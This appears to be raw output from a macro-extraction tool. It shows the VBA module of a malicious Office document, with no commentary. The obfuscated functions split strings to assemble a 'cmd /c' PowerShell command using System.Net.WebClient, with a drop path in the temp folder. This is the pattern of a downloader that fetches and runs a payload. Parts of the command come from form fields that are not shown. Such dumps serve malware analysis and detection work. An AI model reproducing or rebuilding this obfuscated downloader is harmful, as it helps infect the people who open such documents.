Filename     : ./macros/e62ac7980c437398d83f5298b3f047035d6f12c974cea1fd226947af497d6afd
OLE stream   : Macros/VBA/Module1
VBA filename : Module1.bas
----------------------------------------
Attribute VB_Name = "Module1"

Function Func_one()
Func_one = UserForm1.Label5.Caption + "d /c " + UserForm1.text4.Text + UserForm1.Label2.Caption
End Function

Function ine()
j = ThisDocument.CodeName
ine = ""
If j = "ThisDocument" Then UserForm1.Label2.Caption = "She" + "ll" + str Else ine = ""
End Function

Function str()
sp = "ect "
ot = "."
dot = "stem."
ss2 = "Sy" + dot
string1 = "et" + ot + "WebC" + UserForm1.Label2.Caption
deef = "w-"
sas = "N"
str = " (" + "Ne" + deef + "Obj" + sp + ss2 + sas + string1
End Function

Function Exo()
m = "%\" + "wyrar"
s = "%"
Exo = s + "T" + "MP" + m
End Function

